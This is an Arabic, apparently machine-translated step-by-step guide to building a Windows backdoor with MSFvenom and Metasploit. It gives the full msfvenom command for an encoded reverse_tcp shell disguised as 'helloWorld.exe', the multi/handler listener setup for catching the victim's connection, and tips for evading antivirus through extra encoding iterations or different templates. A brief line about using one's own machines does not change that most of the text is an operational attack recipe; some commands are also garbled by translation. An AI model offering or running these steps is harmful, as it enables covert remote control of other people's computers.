يتم استخدام الباب الخلفي لتجاوز آليات الأمان ، وغالبًا ما يتم ذلك بشكل سري وغير قابل للكشف في الغالب. باستخدام MSFvenom ، وهو مزيج من msfpayload و msfencode ، من الممكن إنشاء باب خلفي يتصل مرة أخرى بالمهاجم باستخدام بروتوكول TCP العكسي. من أجل تطوير باب خلفي ، تحتاج إلى تغيير توقيع برنامجك الضار لتفادي أي برنامج مضاد فيروسات. أكمل هذا المشروع على زوج من أجهزة الكمبيوتر التي لديك إذن للوصول إليها ، وفي هذه العملية ، ستتعلم المزيد عن أمان الكمبيوتر وكيف يعمل هذا النوع من الباب الخلفي.
خطوات
الخطوة 1. ابدأ تشغيل Kali وقم بتشغيل وحدة التحكم الطرفية
الخطوة 2. اكتب ifconfig لعرض الواجهة والتحقق من عنوان IP الخاص بك
الخطوة 3. اكتب ترميز msfvenom -l لإظهار قائمة الترميز
ستستخدم x86 / shikata_ga_nai كبرنامج تشفير
الخطوة 4. اكتب "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe
- -a x86 - يحدد نظام التشغيل windows هندسة معمارية لاستخدامها.
- -p windows / shell / reverse_tcp يعين الحمولات المراد تضمينها.
- يعيّن LHOST عنوان IP الخاص بالمستمع.
- يعين LPORT منفذ الإصغاء.
- يتم تعيين -b "\ x00" لتجنب الحرف السيئ (بايت فارغ).
- يعيّن -e x86 / shikata_ga_nai اسم أجهزة التشفير.
- -f exe> helloWorld.exe يعين تنسيق الإخراج.
الخطوة 5. اكتب msfconsole لتنشيط Metasploit
الآن قمت بإنشاء الباب الخلفي الخاص بك. عندما تنقر الضحية على helloWorld.exe ، سيتم تنشيط حمولة shell المضمنة وإعادة الاتصال بنظامك. لتلقي الاتصال ، يجب عليك فتح المعالج المتعدد في Metasploit وتعيين الحمولات
الخطوة 6. اكتب استخدام استغلال / متعدد / معالج
الخطوة 7. اكتب مجموعة الحمولة windows / shell / reverse_tcp
الخطوة 8. اكتب خيارات العرض للتحقق من الوحدة
الخطوة 9. اكتب set LHOST 192.168.48.129
يعيّن "LHOST" عنوان IP للمستمع
الخطوة 10. اكتب تعيين LPORT 4444
يعين "LPORT" منفذ المصغي
الخطوة 11. اكتب run وانتظر الاتصال من جهاز الضحية
الخطوة 12. انتظر حتى تنقر الضحية على helloWorld.exe
بعد ذلك سيتم توصيلك بجهاز الضحية بنجاح.
نصائح
- استخدام -i في MSFvenom سيمثل التكرارات في الترميز. في بعض الأحيان ، قد تساعد المزيد من التكرارات في التهرب من برنامج AV.
- لقد تعلمت كيفية إنشاء الباب الخلفي والتشفير باستخدام MSFvenom ، لكن هذه الطريقة لن تعمل بشكل مثالي مع بعض برامج AV في الوقت الحاضر. السبب وراء ذلك هو بسبب قوالب التنفيذ في MSFvenom. أضاف بائعو AV التوقيع الثابت لهذه القوالب وابحثوا عنها فقط. الحل لهذه المشكلة هو استخدام قالب تنفيذ مختلف أو أدوات مختلفة.